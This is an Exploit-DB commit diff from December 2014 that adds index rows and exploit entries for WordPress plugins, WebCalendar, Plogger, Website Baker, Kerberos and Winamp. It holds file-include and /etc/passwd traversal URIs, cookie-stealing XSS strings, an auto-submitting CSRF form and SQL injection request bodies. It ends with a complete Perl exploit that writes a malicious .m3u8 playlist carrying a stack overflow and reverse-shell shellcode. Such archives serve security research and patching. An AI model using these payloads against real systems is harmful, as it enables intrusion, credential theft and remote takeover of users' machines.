Updated 12_26_2014

This commit is contained in:
Offensive Security 2014-12-26 04:52:07 +00:00
parent 4c02ce5463
commit dce6793115
8 changed files with 200 additions and 0 deletions

View file

@ -32060,3 +32060,10 @@ id,file,description,date,author,platform,type,port
35602,platforms/php/webapps/35602.txt,"Etki Video PRO 2.0 kategori.asp cat Parameter SQL Injection",2011-04-11,Kurd-Team,php,webapps,0
35603,platforms/php/webapps/35603.txt,"Live Wire 2.3.1 For Wordpress Multiple Security Vulnerabilities",2011-04-11,MustLive,php,webapps,0
35604,platforms/php/webapps/35604.txt,"eForum 1.1 '/eforum.php' Arbitrary File Upload Vulnerability",2011-04-09,QSecure,php,webapps,0
35606,platforms/linux/remote/35606.txt,"MIT Kerberos 5 kadmind Change Password Feature Remote Code Execution Vulnerability",2011-04-11,"Felipe Ortega",linux,remote,0
35607,platforms/php/webapps/35607.txt,"Spellchecker Plugin 3.1 for WordPress 'general.php' Local and Remote File Include Vulnerabilities",2011-04-12,"Dr Trojan",php,webapps,0
35608,platforms/php/webapps/35608.txt,"The Gazette Edition 2.9.4 For Wordpress Multiple Security Vulnerabilities",2011-04-12,MustLive,php,webapps,0
35609,platforms/php/webapps/35609.txt,"WebCalendar 1.2.3 Multiple Cross Site Scripting Vulnerabilities",2011-04-12,"High-Tech Bridge SA",php,webapps,0
35610,platforms/php/webapps/35610.txt,"Plogger 1.0 Rc1 'gallery_name' Parameter Cross Site Scripting Vulnerability",2011-04-12,"High-Tech Bridge SA",php,webapps,0
35611,platforms/php/webapps/35611.txt,"Website Baker 2.8.1 Multiple SQL Injection Vulnerabilities",2011-04-12,"High-Tech Bridge SA",php,webapps,0
35612,platforms/windows/remote/35612.pl,"Winamp 5.6.1 '.m3u8' File Remote Buffer Overflow Vulnerability",2011-04-12,KedAns-Dz,windows,remote,0

Can't render this file because it is too large.

View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/47310/info
MIT Kerberos is prone to a remote code-execution vulnerability in 'kadmind'.
An attacker may exploit this issue to execute arbitrary code with superuser privileges. Failed attempts will cause the affected application to crash, denying service to legitimate users. A successful exploit will completely compromise affected computers.
MIT Kerberos 5 1.7 and later are vulnerable.
NOTE (April 13, 2011): This BID was originally titled 'MIT Kerberos kadmind Version String Processing Remote Denial Of Service Vulnerability', but has been renamed to better reflect the nature of the issue.
# nmap -n -sV krb01

13
platforms/php/webapps/35607.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/47317/info
The Spellchecker plugin for WordPress is prone to a local file-include vulnerability and a remote file-include vulnerability because the application fails to sufficiently sanitize user-supplied input.
Exploiting these issues may allow an attacker to execute arbitrary local and remote scripts in the context of the webserver process or obtain potentially sensitive information. This may result in a compromise of the application and the underlying system; other attacks are also possible.
Spellchecker 3.1 is vulnerable; other versions may also be affected.
The following example URIs are available:
http://www.example.com/general.php?file=http://sitename.com/Evil.txt?
http://www.example.com/general.php?file=../../../../../../../etc/passwd

13
platforms/php/webapps/35608.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/47320/info
The Gazette Edition for Wordpress is prone to multiple security vulnerabilities. These vulnerabilities include multiple denial-of-service vulnerabilities, a cross-site scripting vulnerability, and an information-disclosure vulnerability.
Exploiting these issues could allow an attacker to deny service to legitimate users, gain access to sensitive information, execute arbitrary script code, or steal cookie-based authentication credentials. Other attacks may also be possible.
Gazette Edition for Wordpress 2.9.4 and prior versions are vulnerable.
http://www.example.com/wp-content/themes/gazette/thumb.php?src=1%3Cbody%20onload=alert(document.cookie)%3E
http://www.example.com/wp-content/themes/gazette/thumb.php?src=http://site
http://www.example.com/wp-content/themes/gazette/thumb.php?src=http://site/big_file&h=1&w=1

10
platforms/php/webapps/35609.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/47328/info
WebCalendar is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
WebCalendar 1.2.3 is vulnerable; other versions may also be affected.
http://www.example.com/login.php?last_login=123%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/colors.php?color="><%73cript>alert(document.cookie);</%73cript>

21
platforms/php/webapps/35610.txt Executable file
View file

@ -0,0 +1,21 @@
source: http://www.securityfocus.com/bid/47329/info
Plogger is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Plogger 1.0 Rc1 is vulnerable; other versions may also be affected.
<form action="http://host/plog-admin/plog-options.php" method="post">
<input type="hidden" name="gallery_name" value='my gallery"><script>alert(document.cookie)</script>'>
<input type="hidden" name="gallery_url" value="http://host/">
<input type="hidden" name="admin_username" value="Ildar">
<input type="hidden" name="admin_email" value="valeevildar@ya.ru">
<input type="hidden" name="admin_password" value="">
<input type="hidden" name="confirm_admin_password" value="">
<input type="submit" id="btn" name="submit" value="Update Options">
</form>
<script>
document.getElementById('btn').click();
</script>

16
platforms/php/webapps/35611.txt Executable file
View file

@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/47332/info
Website Baker is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Website Baker 2.8.1 is vulnerable; other versions may also be affected.
POST /admin/users/add.php HTTP/1.1
user_id=&username_fieldname=username_1hnuvyv2&username_1hnuvyv2=test&password=password&password2=password&display_name=test&email=test%40test.com&home_folder=123'SQL_CODE&groups%5B%5D=123'SQL_CODE&active%5B%5D=1&submit=Add
POST /admin/groups/add.php HTTP/1.1
advanced=no&group_id=&group_name=123%27SQL_CODE_HERE&module_permissions%5B%5D=code&module_permissions%5B%5D=form&module_permissions%5B%5D=menu_link&module_permissions%5B%5D=news&module_permissions%5B%5D=wrapper&module_permissions%5B%5D=wysiwyg&template_permissions%5B%5D=allcss&template_permissions%5B%5D=argos_theme&template_permissions%5B%5D=blank&template_permissions%5B%5D=classic_theme&template_permissions%5B%5D=round&template_permissions%5B%5D=simple&template_permissions%5B%5D=wb_theme&submit=Add

109
platforms/windows/remote/35612.pl Executable file
View file

@ -0,0 +1,109 @@
source: http://www.securityfocus.com/bid/47333/info
Winamp is prone to a remote buffer-overflow vulnerability because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer.
Attackers can execute arbitrary code in the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
Winamp 5.6.1 is vulnerable; other versions may also be affected.
#!/usr/bin/perl
###
# Title : Winamp 5.6.1 (.m3u8) Stack Buffer Overflow
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com || ked-h@exploit-id.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : windows
# Impact : Stack Overflow
# Tested on : Windows XP sp3 FR
###
# Note : BAC 2011 Enchallah ( Me & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
##
# [»] ~ special thanks to : jos_ali_joe (exploit-id.com) , and All exploit-id Team
###
my $header = "#EXTM3U\n";
my $junk = "\x41" x 16240; # Buffer Junk
my $eip = "\xad\x86\x0e\x07"; # overwrite EIP - 070E86AD | FFD4 CALL ESP nde.dll
my $seh = pack('V',0x10017928); # add ESP,4404
$seh = $seh.pack('V',0x00000003); # Value de : EAX
$seh = $seh."\x41" x 11;
$seh = $seh.pack('V',0x41414141); # Value de : ECX
$seh = $seh."\x41" x 3;
$seh = $seh.pack('V',0x007EA478); # Value de : EDX
$seh = $seh."\x41" x 22;
$seh = $seh.pack('V',0x40000001); # Value de : EBX
$seh = $seh."\x41" x 8;
$seh = $seh.pack('V',0x028F1DB0); # Valeu de : ESP
$seh = $seh."\x41" x 12;
$seh = $seh.pack('V',0x77230459); # Valeu de : EBP
$seh = $seh."\x41" x 10;
$seh = $seh.pack('V',0x08FD62A8); # Valeu de : ESI
$seh = $seh."\x41" x 11;
$seh = $seh.pack('V',0x00497300); # Valeu de : EDI
$seh = $seh."\x41" x 2;
$seh = $seh.pack('V',0x08FD293C); # Valeu de : EIP
$seh = $seh."\x41" x 5;
my $nops = "\x90" x 100; # Nop
my $space = "\x41" x (43492 - length($junk) - length($nops));
my $shellcode = # windows/shell_reverse_tcp (http://www.metasploit.com)
"\x56\x54\x58\x36\x33\x30\x56\x58\x48\x34\x39\x48\x48\x48" .
"\x50\x68\x59\x41\x41\x51\x68\x5a\x59\x59\x59\x59\x41\x41" .
"\x51\x51\x44\x44\x44\x64\x33\x36\x46\x46\x46\x46\x54\x58" .
"\x56\x6a\x30\x50\x50\x54\x55\x50\x50\x61\x33\x30\x31\x30" .
"\x38\x39\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41" .
"\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42" .
"\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x4d" .
"\x38\x4e\x69\x47\x70\x43\x30\x45\x50\x45\x30\x4d\x59\x4a" .
"\x45\x45\x61\x48\x52\x43\x54\x4e\x6b\x50\x52\x50\x30\x4c" .
"\x4b\x51\x42\x46\x6c\x4e\x6b\x46\x32\x46\x74\x4c\x4b\x50" .
"\x72\x46\x48\x46\x6f\x4f\x47\x43\x7a\x51\x36\x46\x51\x49" .
"\x6f\x46\x51\x4f\x30\x4e\x4c\x47\x4c\x43\x51\x43\x4c\x43" .
"\x32\x44\x6c\x47\x50\x4f\x31\x48\x4f\x46\x6d\x43\x31\x49" .
"\x57\x48\x62\x4c\x30\x51\x42\x42\x77\x4c\x4b\x50\x52\x42" .
"\x30\x4c\x4b\x43\x72\x45\x6c\x46\x61\x4a\x70\x4c\x4b\x43" .
"\x70\x43\x48\x4e\x65\x4b\x70\x42\x54\x50\x4a\x45\x51\x48" .
"\x50\x46\x30\x4e\x6b\x50\x48\x45\x48\x4e\x6b\x51\x48\x51" .
"\x30\x45\x51\x48\x53\x48\x63\x47\x4c\x43\x79\x4e\x6b\x47" .
"\x44\x4e\x6b\x46\x61\x4b\x66\x50\x31\x4b\x4f\x44\x71\x4f" .
"\x30\x4e\x4c\x49\x51\x4a\x6f\x46\x6d\x46\x61\x4f\x37\x46" .
"\x58\x4d\x30\x42\x55\x4a\x54\x46\x63\x43\x4d\x4c\x38\x47" .
"\x4b\x51\x6d\x44\x64\x44\x35\x49\x72\x43\x68\x4c\x4b\x50" .
"\x58\x45\x74\x47\x71\x48\x53\x51\x76\x4e\x6b\x46\x6c\x42" .
"\x6b\x4c\x4b\x42\x78\x47\x6c\x45\x51\x48\x53\x4e\x6b\x45" .
"\x54\x4c\x4b\x47\x71\x48\x50\x4f\x79\x42\x64\x44\x64\x47" .
"\x54\x51\x4b\x51\x4b\x43\x51\x50\x59\x43\x6a\x46\x31\x4b" .
"\x4f\x4d\x30\x50\x58\x43\x6f\x43\x6a\x4c\x4b\x45\x42\x48" .
"\x6b\x4e\x66\x43\x6d\x42\x48\x50\x33\x44\x72\x45\x50\x43" .
"\x30\x51\x78\x42\x57\x42\x53\x46\x52\x43\x6f\x50\x54\x43" .
"\x58\x42\x6c\x44\x37\x44\x66\x45\x57\x49\x6f\x48\x55\x48" .
"\x38\x4c\x50\x47\x71\x45\x50\x47\x70\x47\x59\x4b\x74\x51" .
"\x44\x42\x70\x42\x48\x44\x69\x4d\x50\x42\x4b\x43\x30\x49" .
"\x6f\x48\x55\x50\x50\x42\x70\x50\x50\x42\x70\x47\x30\x42" .
"\x70\x43\x70\x50\x50\x43\x58\x48\x6a\x44\x4f\x49\x4f\x4d" .
"\x30\x49\x6f\x4b\x65\x4e\x69\x48\x47\x42\x48\x43\x4f\x45" .
"\x50\x43\x30\x47\x71\x43\x58\x43\x32\x45\x50\x44\x51\x43" .
"\x6c\x4e\x69\x4a\x46\x51\x7a\x42\x30\x51\x46\x43\x67\x42" .
"\x48\x4d\x49\x4e\x45\x51\x64\x51\x71\x49\x6f\x4e\x35\x50" .
"\x68\x42\x43\x42\x4d\x42\x44\x47\x70\x4c\x49\x48\x63\x51" .
"\x47\x51\x47\x51\x47\x50\x31\x4b\x46\x51\x7a\x47\x62\x51" .
"\x49\x50\x56\x4d\x32\x49\x6d\x50\x66\x4f\x37\x42\x64\x46" .
"\x44\x45\x6c\x47\x71\x43\x31\x4c\x4d\x50\x44\x51\x34\x42" .
"\x30\x4a\x66\x43\x30\x43\x74\x50\x54\x42\x70\x43\x66\x43" .
"\x66\x51\x46\x47\x36\x46\x36\x42\x6e\x50\x56\x46\x36\x42" .
"\x73\x43\x66\x50\x68\x44\x39\x48\x4c\x47\x4f\x4b\x36\x4b" .
"\x4f\x48\x55\x4c\x49\x4b\x50\x50\x4e\x42\x76\x43\x76\x49" .
"\x6f\x50\x30\x42\x48\x43\x38\x4c\x47\x47\x6d\x43\x50\x49" .
"\x6f\x4e\x35\x4f\x4b\x4a\x50\x4d\x65\x4d\x72\x51\x46\x51" .
"\x78\x4d\x76\x4e\x75\x4f\x4d\x4d\x4d\x4b\x4f\x48\x55\x47" .
"\x4c\x46\x66\x43\x4c\x45\x5a\x4b\x30\x49\x6b\x49\x70\x43" .
"\x45\x45\x55\x4d\x6b\x51\x57\x44\x53\x43\x42\x42\x4f\x51" .
"\x7a\x47\x70\x46\x33\x4b\x4f\x49\x45\x41\x41";
my $end = "\x90" x (20000 - $nops); # Nop sled
open(FILE,'>>KedAns.m3u8');
print FILE $header.$junk.$space.$seh.$nops.$eip.$shellcode.$end;
close(FILE);